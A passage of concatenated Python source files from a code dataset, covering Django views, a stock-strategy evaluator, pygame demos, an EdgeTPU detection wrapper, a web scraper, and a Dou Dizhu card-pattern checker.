PreprocCmdInfo(NodeTransformer):\n \n def __init__(self, aa):\n super(PreprocCmdInfo, self).__init__()\n self.p = aa.p\n self.topic = aa.topic\n\n def visit_Name(self, node):\n if node.id == 'TARGET_DIRECTORY':\n\n self.p.lineno = node.lineno\n self.p.col_offset = node.col_offset\n return self.p\n\n if node.id == 'TOPIC':\n\n self.topic.lineno = node.lineno\n self.topic.col_offset = node.col_offset\n return self.topic\n\n else:\n return node","sub_path":"src/astop/preproc_cmd_info.py","file_name":"preproc_cmd_info.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358875219","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport traceback\nimport datetime\nfrom django.db.models import Q\nfrom polls.util import commonUtil\nfrom polls.models import StockStrategy, Strategy, Data1, Data2, Data3, Data4\nfrom polls.module import analysis, data, test\n\nprev = 45\t#特征值前数据个数\nlast = 15\t#特征值后数据个数\n\ncheckDateList = [1, 3, 5, 10, 30]\n\ndef _delStrategyRate(strategy):\n\tcount, ret = StockStrategy.objects.filter(strategy=strategy).delete()\n\tcommonUtil.debug('[StockStrategy]: ' + strategy + ' delete ' + str(count) + ' item(s)')\n\tcount, ret = Strategy.objects.filter(strategy=strategy).delete()\n\tcommonUtil.debug('[Strategy]: ' + strategy + ' delete ' + str(count) + ' item(s)')\n\ndef _saveRate(code, stType, matchcount, date, curDateRate, item, countList, sucList, suc1List, voidList, failList):\n\tdata = StockStrategy(code=code, strategy=stType, matchcount=matchcount, date=date, \n\t\tcurDateRate=curDateRate, supershort=item[0], short=item[1], middle=item[2], Long=item[3], superlong=item[4],\n\t\tsupershortcount=countList[0],shortcount=countList[1],middlecount=countList[2],Longcount=countList[3],superlongcount=countList[4],\n\t\tsupershortrate=sucList[0], shortrate=sucList[1], middlerate=sucList[2], Longrate=sucList[3], superlongrate=sucList[4],\n\t\tsupershortsuc=suc1List[0], shortsuc=suc1List[1], middlesuc=suc1List[2], Longsuc=suc1List[3], superlongsuc=suc1List[4],\n\t\tsupershortvoid=voidList[0], shortvoid=voidList[1], middlevoid=voidList[2], Longvoid=voidList[3], superlongvoid=voidList[4],\n\t\tsupershortfail=failList[0], shortfail=failList[1], middlefail=failList[2], Longfail=failList[3], superlongfail=failList[4])\n\tret = data.save()\n\ndef _saveStrategyRate(stType, matchcount, codematchcount, item, countList, sucList, suc1List, voidList, failList):\n\tdata = Strategy(strategy=stType, matchcount=matchcount, codematchcount=codematchcount,\n\t\tsupershort=item[0], short=item[1], middle=item[2], Long=item[3], superlong=item[4],\n\t\tsupershortcount=countList[0],shortcount=countList[1],middlecount=countList[2],Longcount=countList[3],superlongcount=countList[4],\n\t\tsupershortrate=sucList[0], shortrate=sucList[1], middlerate=sucList[2], Longrate=sucList[3], superlongrate=sucList[4],\n\t\tsupershortsuc=suc1List[0], shortsuc=suc1List[1], middlesuc=suc1List[2], Longsuc=suc1List[3], superlongsuc=suc1List[4],\n\t\tsupershortvoid=voidList[0], shortvoid=voidList[1], middlevoid=voidList[2], Longvoid=voidList[3], superlongvoid=voidList[4],\n\t\tsupershortfail=failList[0], shortfail=failList[1], middlefail=failList[2], Longfail=failList[3], superlongfail=failList[4])\n\tret = data.save()\t\n\ndef _calRate(dataList, count): #计算幅度\n\trate = 100\n\tif len(dataList) < count:\n\t\treturn '-'\n\tfor i in range(count):\n\t\trate *= (100 + float(dataList[i][4])) / 100\n\treturn round(rate, 2)\n\ndef _classifyFilter(ft, code, stType, matchcount):\n\tnull = ['-'] * 5\n\trateList = []\n\tdate = ft[0][0].split(' ')[0] #\"2000-04-06 (Tag)\"日期格式去掉Tag\n\tfor count in checkDateList: #分类计算\n\t\trateList.append(_calRate(ft[1:count+1], count))\n\t_saveRate(code, stType, matchcount, date, ft[0][4], rateList, null, null, null, null, null)\t#保存幅度结果\n\treturn [100 if x == '-' else x for x in rateList] #如果是‘-’替换成标准值100\n\t\n\ndef _addList(comList, rateList):\n\treturn list(map(lambda a,b:a+b, comList, rateList))\n\ndef _forFilter(filterList, code, stType):\n\tmatchcount = 0\n\tcomSucList = [0] * 5 #初始化每个code sucList值(3%)\n\tcomSuc1List = [0] * 5 #初始化每个code suc1List值(1%)\n\tcomVoidList = [0] * 5 #初始化每个code voidList值\n\tcomFailList = [0] * 5 #初始化每个code failList值\n\tcomRateList = [0] * 5 #初始化每个code rateList值\n\tfor item in filterList: #循环筛选列表\n\t\tmatchcount += 1\n\t\trateList = _classifyFilter(item['selectedData'][prev :], code, stType, matchcount)\n\t\tcomSucList = _addList(comSucList, [1 if x >= 103 else 0 for x in rateList]) #每项大于103数目相加\n\t\tcomSuc1List = _addList(comSuc1List, [1 if x >= 101 else 0 for x in rateList]) #每项大于101数目相加\n\t\tcomVoidList = _addList(comVoidList, [1 if 101 > x > 99 else 0 for x in rateList]) #每项99-101数目相加\n\t\tcomFailList = _addList(comFailList, [1 if x <= 99 else 0 for x in rateList]) #每项小于99数目相加\n\t\tcomRateList = _addList(comRateList, rateList) #每项rate值相加\n\n\tif matchcount:\t#必须有筛选��,否则不用计算综合值\n\t\tcomRateList = [round(x/matchcount, 2) for x in comRateList] #计算每个code综合rate值\n\t\tcomSucRatioList = [round(x/matchcount*100, 2) for x in comSucList] #计算每个code综合suc占比值\n\t\tcomSuc1RatioList = [round(x/matchcount*100, 2) for x in comSuc1List] #计算每个code综合suc1占比值\n\t\tcomVoidRatioList = [round(x/matchcount*100, 2) for x in comVoidList] #计算每个code综合void占比值\n\t\tcomFailRatioList = [round(x/matchcount*100, 2) for x in comFailList] #计算每个code综合fail占比值\n\t\t_saveRate(code, stType, matchcount, '-', '-', comRateList, comSucList, comSucRatioList, comSuc1List, comVoidList, comFailList) #保存每个code综合rate值\n\t\treturn commonUtil.debug(code + ' train [' + stType + '] save success')\n\n\treturn commonUtil.debug(code + ' train [' + stType + '] no result!')\n\n#策略列表\nstNameList = {\n\t#\"2\": \"strategy1\",\n\t\"3\": \"strategy2\",\n\t#\"4\": \"strategy3\",\n\t#\"5\": \"strategy4\",\n\t#\"6\": \"strategy5\",\n\t#\"7\": \"strategy6\",\n\t#\"8\": \"strategy7\",\n\t#\"9\": \"strategy8\",\n\t#\"10\": \"strategy9\",\n} \n\ndataItemList = ['supershort','short', 'middle', 'Long', 'superlong', \n\t'supershortcount', 'shortcount', 'middlecount', 'Longcount', 'superlongcount', \n\t'supershortsuc', 'shortsuc', 'middlesuc', 'Longsuc', 'superlongsuc',\n\t'supershortvoid', 'shortvoid', 'middlevoid', 'Longvoid', 'superlongvoid',\n\t'supershortfail', 'shortfail', 'middlefail', 'Longfail', 'superlongfail']\n\ndef _addComRate(rateList):\n\ttotalRateList = [0] * 25 #初始化每个stratery rateList值\n\tfor item in rateList:\n\t\trate = [float(item[index]) for index in dataItemList]\n\t\ttotalRateList = _addList(totalRateList, rate)\n\treturn totalRateList\n\ndef _getCodeCom(stName):\t#根据-获得各code综合值\n\tdata = StockStrategy.objects.filter(strategy = stName, curDateRate = '-').values('supershort','short', \n\t\t'middle', 'Long', 'superlong', 'supershortcount', 'shortcount', 'middlecount', 'Longcount', 'superlongcount', \n\t\t'supershortsuc', 'shortsuc', 'middlesuc', 'Longsuc', 'superlongsuc',\n\t\t'supershortvoid', 'shortvoid', 'middlevoid', 'Longvoid', 'superlongvoid',\n\t\t'supershortfail', 'shortfail', 'middlefail', 'Longfail', 'superlongfail')\n\trateList = commonUtil.queryset_to_dict(data, ['supershort','short', \n\t\t'middle', 'Long', 'superlong', 'supershortcount', 'shortcount', 'middlecount', 'Longcount', 'superlongcount', \n\t\t'supershortsuc', 'shortsuc', 'middlesuc', 'Longsuc', 'superlongsuc',\n\t\t'supershortvoid', 'shortvoid', 'middlevoid', 'Longvoid', 'superlongvoid',\n\t\t'supershortfail', 'shortfail', 'middlefail', 'Longfail', 'superlongfail'])\n\tcount = StockStrategy.objects.filter(strategy = stName).exclude(curDateRate = '-').count()\n\treturn count, rateList\n\ndef _strategyRate(stName):\n\tcount, rateList = _getCodeCom(stName)\t#根据-获得各code综合值\n\tn = len(rateList)\n\tret = _addComRate(rateList)\t#综合值相加\n\n\ttotalSucList = ret[5:10]\n\ttotalSuc1List = ret[10:15]\n\ttotalVoidList = ret[15:20]\n\ttotalFailList = ret[20:]\n\tif n:\n\t\ttotalRateList = [round(x / n, 2) for x in ret[:5]] #前边5个为幅度\n\t\ttotalSucRatioList = [round(x / count, 2) for x in totalSucList]\t#后边5个为数目\n\t\ttotalSuc1RatioList = [round(x / count, 2) for x in totalSuc1List]\t#\n\t\ttotalVoidRatioList = [round(x / count, 2) for x in totalVoidList]\t#\n\t\ttotalFailRatioList = [round(x / count, 2) for x in totalFailList]\t#\n\n\t\t_saveStrategyRate(stName, count, n, totalRateList, totalSucList, totalSucRatioList, totalSuc1RatioList, totalVoidRatioList, totalFailRatioList) #保存每个strategy综合rate值\n\ndef _codeDataMatch(code, stIndex, stName):\n\tstockList = []\n\tflag, stockData = commonUtil.queryUnfoldDataT(code) #获取code对应data\n\tfor item in stockData['data']:\n\t\tstockList.append(commonUtil.dictToList(item, ['date','start', 'end', 'change', 'changeRate', 'top', 'bottom', 'volume', 'trade', 'tradeRate']))\n\t#stockList = commonUtil.getPreData(code)\n\tfilterList, stType = analysis._packageData(stockList, prev, last, stIndex)\t#将data用strategy匹配\n\t_forFilter(filterList, code, stName)\n\ndef _getStockCode(stIndex, stName):\n\tcodeList = data._queryAllStockCode()\t#获取所有code\n\t_delStrategyRate(stName)\t#存入之前,删除对应strategy数据,防止数据重复\n\tfor item in codeList:\n\t\t_codeDataMatch(item['code'], stIndex, stName)\n\t_strategyRate(stName)\t#存入StrategyRate\n\ndef evaluateSt(request):\n\tfor stIndex in stNameList:\t#轮训策略\n\t\t_getStockCode(stIndex, stNameList[stIndex])\n\t#test.testSt('test')\n","sub_path":"polls/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":8834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"290820648","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nwinners_wiki_url = 'https://en.wikipedia.org/w/api.php?action=parse&format=json&prop=text&page=List_of_2016_Summer_Olympics_medal_winners§ion='\n# response = requests.get(wiki_url)\n# data = json.loads(response.text)\n# print(data)\n\n\nhtml_index_list = list(range(1, 78))\nremoveable_indicies = [2, 7, 12, 17, 22, 26, 33, 39, 43, 47, 51, 54, 59, 68, 71, 75, 76, 77, 78]\nfor index in removeable_indicies:\n if index in (html_index_list):\n html_index_list.remove(index)\n\nfor index in html_index_list:\n url = winners_wiki_url + str(index)\n response = requests.get(url)\n HTML = json.loads(response.text)['parse']['text']['*']\n\n\n\n\n\n","sub_path":"Citadel Data Open/Code/webscrape.py","file_name":"webscrape.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"625522327","text":"from django.shortcuts import render_to_response\nfrom django.db.models import Q\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom usuarios.models import *\nfrom gestion_cuestionarios.forms import *\nfrom django.template import RequestContext\n\n\nfrom cuestionarios.models import Cuestionario\n\n\n\ndef view_lista_cuestionarios(request):\n permisos={}\n if \"user\" in request.COOKIES:\n id=int(request.COOKIES.get(\"user\", ''))\n usuario=User.objects.get(id=id)\n userpermisos=UserPermisos.objects.get(user=usuario.id)\n permisos['issueper']=usuario.is_superuser\n permisos['isadmin']=userpermisos.admin\n permisos['issup']=userpermisos.supervisor\n permisos['isexp']=userpermisos.experto\n if userpermisos.experto: \n cuestionarios=Cuestionario.objects.filter(user=id)\n cuestionariosactivos=Cuestionario.objects.filter(~Q(pk__in=cuestionarios)& Q(activo=True))\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'cuestionarios_activos':cuestionariosactivos, 'user':usuario, 'userid':id}\n elif userpermisos.supervisor:\n cuestionarios=Cuestionario.objects.all()\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n else:\n cuestionarios=Cuestionario.objects.filter(activo=True)\n contexto = {'cuestionarios_activos': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n mensaje=''\n \n if \"mensaje\" in request.COOKIES:\n mensaje=request.COOKIES.get(\"mensaje\", '')\n contexto['mensaje']=mensaje\n response=render_to_response(r'gestion_cuestionarios/lista_cuestionarios.html',RequestContext(request, contexto))\n response.delete_cookie(\"mensaje\")\n return response\n else:\n return HttpResponseRedirect('/')\n\ndef view_nuevo_cuestionario(request):\n if \"user\" in request.COOKIES:\n userid=int(request.COOKIES.get(\"user\", ''))\n if request.method==\"POST\":\n form = CuestionarioForm(request.POST)\n if form.is_valid():\n cuestionario=Cuestionario()\n cuestionario.nombre=form.cleaned_data['nombre']\n cuestionario.descripcion=form.cleaned_data['descripcion']\n cuestionario.user_id=userid\n cuestionario.active=False\n cuestionario.save()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n else:\n form = CuestionarioForm()\n contexto={'form':form}\n contexto.update(csrf(request))\n return render_to_response(r'gestion_cuestionarios/nuevo_cuestionario.html',contexto)\n return HttpResponseRedirect('/')\n \ndef view_eliminar_cuestionario(request):\n if 'idcuestionario' in request.GET: \n cuest_id = request.GET['idcuestionario']\n cuestionario = Cuestionario.objects.get(pk=cuest_id)\n cuestionario.delete()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n\ndef view_activar_desc_cuestionarios(request, id):\n cuestionario=Cuestionario.objects.get(pk=id)\n cuestionario.activo=not cuestionario.activo\n cuestionario.save()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n \n","sub_path":"gestion_cuestionarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"154532039","text":"import pygame\r\npygame.init()\r\n\r\nFULL_SCREEN_SIZE = pygame.display.list_modes()[0]\r\nWIN_SIZE = [i // 4 for i in FULL_SCREEN_SIZE]\r\n\r\nscreen = pygame.display.set_mode(WIN_SIZE)\r\n\r\nrun = True\r\nwhile run:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n \r\n pygame.display.flip()\r\n\r\npygame.quit()\r\n","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"267671113","text":"import pygame\nfrom pygame import font \nimport os\nbundle_dir = sys._MEIPASS\nimport sys\n#from images import *\n\n\npygame.init()\nx = pygame.font.get_fonts()\nfor fnts in x:\n\tif fnts == 'freesandsbold':\n\t\tprint (\"found it\")\n\nblack = (0,0,0)\n\ntextBoxImage = pygame.image.load(bundle_dir + '/images/sideMenuBox.png')\t\nlargeText = pygame.font.Font(bundle_dir + '/fonts/FreeSansBold.ttf',25)\nhldtext = \"Press Z to quit\"\n\nclock = pygame.time.Clock()\ngameDisplay = pygame.display.set_mode((800,600)) \n\ndisplaying = True\n\ndef text_objects(text, font):\n\ttextSurface = font.render(text, True, black)\n\treturn textSurface, textSurface.get_rect()\n\n#largeText = pygame.font.Font('freesansbold.ttf',25)\n\n\nwhile displaying:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.KEYUP and event.key == pygame.K_z:\n\t\t\tdiplaying = False\n\t\t\tsys.exit()\n\t\t\tpygame.quit()\n\t\t\t#quit()\n\t\t\n\n\n\tgameDisplay.fill((255, 255, 255))\n\n\tgameDisplay.blit(textBoxImage, (550,1))\t\n\tBottomSurf, BottomRect = text_objects(hldtext, largeText)\n\tBottomRect.center = ((200),(370))\n\tgameDisplay.blit(BottomSurf, BottomRect)\n\tpygame.display.flip()\n\tclock.tick(15)\n\n\t\n","sub_path":"pyIn/pygametest1/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"525158332","text":"import models\n\npulp_fiction = models.Video(\"Pulp Fiction\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.9,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://upload.wikimedia.org/wikipedia/en/8/82/Pulp_Fiction_cover.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=ewlwcEBTvcg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"1994\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\nfight_club = models.Video(\"Fight Club\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.9,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://upload.wikimedia.org/wikipedia/en/f/fc/Fight_Club_poster.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=SUXWAEX2jlg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"1999\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ninception = models.Video(\"Inception\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.8,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://upload.wikimedia.org/wikipedia/en/7/7f/Inception_ver3.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=8hP9D6kZseM\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"2010\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ncity_of_god = models.Video(\"City of God\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.7,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://upload.wikimedia.org/wikipedia/en/1/10/CidadedeDeus.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=_mDvXaRJcTM\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"2002\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ntrue_detective = models.Video(\"True Detective\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.3,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://ecx.images-amazon.com/images/I/A1E8BYXdWML._SL1500_.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=TXwCoNwBSkQ\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"2014 - \"\n\t\t\t\t\t\t\t\t\t\t\t)\n\nhouse_of_cards = models.Video(\"House of Cards\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://img4.wikia.nocookie.net/__cb20140217231358/house-of-cards/images/a/a8/House_of_Cards_Season_1_Poster.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=ULwUzF1q5w4\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"2013 - \"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ncowboy_bebop = models.Video(\"Cowboy Bebop\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://upload.wikimedia.org/wikipedia/en/3/37/CowboyBebopDVDBoxSet.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=LnbKF_uosrA\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"1997 - 1998\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\nbetter_call_saul = models.Video(\"Better Call Saul\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.4,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://proto.mtv.ca/wp-content/uploads/2015/02/tumblr_n1xyxwgXYE1qzpxx1o1_r1_1280.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=9q4qzYrHVmI\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"2015 - \"\n\t\t\t\t\t\t\t\t\t\t\t)\n\n# Sorry, please repeat yourself. List of movies goes here.\nmovies = [pulp_fiction, fight_club, inception, city_of_god, true_detective, house_of_cards, cowboy_bebop, better_call_saul]\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"40481667","text":"\"\"\"Modified EdgeTPU classes for ease of use.\"\"\"\nimport logging\nfrom edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error\n\nfrom edgetpu_server.models.candidate import LabeledDetectionCandidate\n\n_LOGGER = logging.getLogger(__name__)\n\n\n# pylint: disable=too-few-public-methods\nclass DetectionFilter:\n \"\"\"Detection filter data.\"\"\"\n\n def __init__(self, threshold, labels, labels_to_report):\n _LOGGER.warn('Initializing detection engine')\n self.threshold = threshold\n self.labels = labels\n self.labels_to_report = labels_to_report\n\n def filter_candidates(self, candidates):\n \"\"\"Filter the detection engine results.\"\"\"\n filtered_candidates = []\n for result in candidates:\n label = self.labels.get(result.label_id, None)\n if not label or label not in self.labels_to_report:\n continue\n filtered_candidates.append(LabeledDetectionCandidate(label, result))\n\n return filtered_candidates\n\n\nclass FilteredDetectionEngine(DetectionEngine):\n \"\"\"Detection engine that filters detected objects.\"\"\"\n\n def __init__(\n self,\n detection_filter,\n model_path,\n detection_lock,\n device_path=None):\n \"\"\"\n Args:\n model_path (str): Path to a TensorFlow Lite (``.tflite``) file.\n This model must be `compiled for the Edge TPU\n `_; otherwise, it simply executes\n on the host CPU.\n device_path (str): The device path for the Edge TPU this engine should use. This argument\n is needed only when you have multiple Edge TPUs and more inference engines than\n available Edge TPUs. For details, read `how to use multiple Edge TPUs\n `_.\n\n Raises:\n ValueError: If the model's output tensor size is not 4.\n \"\"\"\n _LOGGER.warn('Initializing filtered detection engine')\n DetectionEngine.__init__(self, model_path, device_path)\n self._filter = detection_filter\n self._detection_lock = detection_lock\n\n def filtered_detect_with_image(self, image):\n \"\"\"Perform object detection on an image and passed through the filter criteria.\"\"\"\n self._detection_lock.acquire()\n try:\n return self._filter.filter_candidates(\n self.detect_with_image(\n image,\n threshold=self._filter.threshold / 100,\n keep_aspect_ratio=True,\n relative_coord=False\n )\n )\n finally:\n self._detection_lock.release()\n","sub_path":"edgetpu_server/detection_engine.py","file_name":"detection_engine.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"244986657","text":"#! /usr/bin/env python\n\ndef calc(cur, interest, mp): # current balance, interest, monthlypayments\n newbal=1\n remb=cur \n howmany=0\n while remb > 0:\n remb = remb - (mp - remb * interest / 12)\n howmany += 1\n # sss=raw_input(\"asdasd:\")\n\n newbal = howmany * mp + remb\n return (howmany, newbal)\n\n","sub_path":"Prelab09/Part1MOD.py","file_name":"Part1MOD.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"154096357","text":"import poker\n\n\nclass CardDescription:\n \"\"\"一手有效出牌的描述\"\"\"\n\n def __init__(self, pattern=0, weight=0):\n self.pattern = pattern\n self.weight = weight\n\n\n\"\"\"\n牌型 一个人最多54-3 = 51 51/3=17 最多20张\n这是斗地主的关键,即对牌型进行数字化分类,来判断是否可以出牌,和是否可以接牌\n炸弹统一为 4 2 8 这些小于100的\n101, 单排\n105 - 112 顺子最多为 3-A \n\n\"\"\"\npatterns_single = [101]\npatterns_single_straight = list(range(105, 113))\npatterns_pair = [202]\npatterns_pair_straight = list(range(206, 221, 2))\npatterns_triple = list(range(303, 321, 3))\npatterns_triple_single = list(range(404, 421, 4))\npatterns_triple_pair = list(range(505, 521, 5))\npatterns_four_two = list(range(606, 621, 6))\npatterns_four_pairs = list(range(708, 721, 8))\npatterns_grand_bomb = [2]\npatterns_bombs = list(range(4, 21, 4))\n\n_patterns_all = patterns_grand_bomb + patterns_bombs + \\\n patterns_single + patterns_single_straight + \\\n patterns_pair + patterns_pair_straight + \\\n patterns_triple + patterns_triple_single + patterns_triple_pair + \\\n patterns_four_two + patterns_four_pairs\n\n_patterns_text = [(patterns_grand_bomb, '王炸'),\n ([4], '炸弹'),\n (list(range(8, 21, 4)), '连炸'),\n (patterns_single, '*'),\n (patterns_single_straight, '顺子'),\n (patterns_pair, '对*'),\n (patterns_pair_straight, '连对'),\n ([303], \"三个*\"),\n ([404], '三带一'), ([505], '三带二'),\n ([606], '四带二'), ([708], '四带四'), ([612, 618, 716], '航天飞机!')]\n\n\ndef pattern_is_bomb(p):\n if p in patterns_grand_bomb or p in patterns_bombs:\n return True\n\n\ndef _switch_bomb_value(p):\n if p == 2:\n return 4\n elif p == 4:\n return 2\n else:\n return p\n\n\ndef _is_cd_bigger(cd: CardDescription, old_cd: CardDescription) -> bool:\n \"\"\"cd 是否大于old_cd, 大于就符合该cd\"\"\"\n if pattern_is_bomb(old_cd.pattern):\n old_bomb_p = _switch_bomb_value(old_cd.pattern)\n if pattern_is_bomb(cd.pattern):\n bomb_p = _switch_bomb_value(cd.pattern)\n if bomb_p > old_bomb_p:\n return True\n elif bomb_p == old_bomb_p:\n return cd.weight > old_cd.weight\n else:\n return False\n else:\n return False\n\n else:\n if pattern_is_bomb(cd.pattern):\n return True\n else:\n # 两个都不是bomb\n if cd.pattern == old_cd.pattern:\n return cd.weight > old_cd.weight\n else:\n return False\n\n\ndef is_cd_bigger(cd: CardDescription, old_cd: CardDescription) -> CardDescription:\n if _is_cd_bigger(cd, old_cd):\n return cd\n\n\ndef _single_or_straight_without_2(cards):\n pre = cards[0]\n for i in range(1, len(cards)):\n if pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return False\n if pre <= poker.MIN3_2 or len(cards) == 1:\n return True\n\n# 下面是所有牌型检查\n\n\ndef _check_grand_bomb(cards):\n if cards[0] == poker.MIN3['V'] and cards[1] == poker.MIN3['W']:\n return CardDescription(2, cards[0])\n\n\ndef _check_bomb(cards):\n if cards[0] == cards[1] == cards[2] == cards[3]:\n pre = cards[0]\n for i in range(4, len(cards), 4):\n if cards[i] == cards[i + 1] == cards[i + 2] == cards[i + 3] and pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if pre <= poker.MIN3['A']:\n return CardDescription(len(cards), cards[0])\n\n\ndef _check_single(cards):\n return CardDescription(101, cards[0])\n\n\ndef _check_single_straight_(cards):\n pre = cards[0]\n for i in range(1, len(cards)):\n if pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if pre <= poker.MIN3['A']:\n return CardDescription(100 + len(cards), cards[0])\n\n\ndef _check_pair(cards):\n if cards[0] == cards[1]:\n return CardDescription(202, cards[0])\n\n\ndef _check_pair_straight(cards):\n if cards[0] == cards[1]:\n pre = cards[0]\n for i in range(2, len(cards), 2):\n if cards[i] == cards[i + 1] and pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if pre < poker.MIN3_2:\n return CardDescription(200 + len(cards), cards[0])\n\n\ndef _check_triple(cards):\n if cards[0] == cards[1] == cards[2]:\n pre = cards[0]\n for i in range(3, len(cards), 3):\n if cards[i] == cards[i + 1] == cards[i + 2] and pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if len(cards) > 3 and pre >= poker.MIN3_2:\n return\n return CardDescription(300 + len(cards), cards[0])\n\n\ndef _check_triple_single(cards):\n splits = poker.split_min3(cards)\n if 3 not in splits:\n return None\n is_straight = _single_or_straight_without_2(splits[3])\n if is_straight:\n if len(cards) == len(splits[3]) * 4:\n return CardDescription(400 + len(cards), splits[3][0])\n\n\ndef _check_triple_pair(cards):\n splits = poker.split_min3(cards)\n if 3 not in splits or 1 in splits or 4 in splits:\n return None\n is_straight = _single_or_straight_without_2(splits[3])\n if is_straight:\n if len(cards) == len(splits[3]) * 5:\n return CardDescription(500 + len(cards), splits[3][0])\n\n\ndef _check_four_two(cards):\n splits = poker.split_min3(cards)\n if 4 not in splits:\n return None\n is_straight = _single_or_straight_without_2(splits[4])\n if is_straight:\n if len(cards) == len(splits[4]) * 6:\n return CardDescription(600 + len(cards), splits[4][0])\n\n\ndef _check_four_pairs(cards):\n \"\"\"\n 四个一样的牌不允许拆分,防止歧义\n \"\"\"\n for i in range(0, len(cards), 2):\n if cards[i] != cards[i + 1]:\n return None\n # 寻找4个一样的牌的list\n fours = []\n for i in range(0, len(cards), 4):\n if cards[i] == cards[i + 2]:\n fours.append(cards[i])\n\n if len(fours) == len(cards) / 8:\n pre = fours[0]\n if i in range(1, len(fours)):\n if fours[i] == pre:\n pre = fours[i]\n else:\n return None\n return CardDescription(700 + len(cards), fours[0])\n\n\n_pattern_map_check = [(patterns_grand_bomb, _check_grand_bomb),\n (patterns_bombs, _check_bomb),\n (patterns_single, _check_single),\n (patterns_single_straight, _check_single_straight_),\n (patterns_pair, _check_pair),\n (patterns_pair_straight, _check_pair_straight),\n (patterns_triple, _check_triple),\n (patterns_triple_single, _check_triple_single),\n (patterns_triple_pair, _check_triple_pair),\n (patterns_four_two, _check_four_two),\n (patterns_four_pairs, _check_four_pairs)]\n\n\ndef _get_function_from_pattern(p):\n \"\"\"由pattern得到检查函数\"\"\"\n for one_tuple in _pattern_map_check:\n if p in one_tuple[0]:\n return one_tuple[1]\n\n\n\"\"\"\n生成length到函数的字典\n\"\"\"\n_length_to_pattern_functions = {}\n\n\ndef 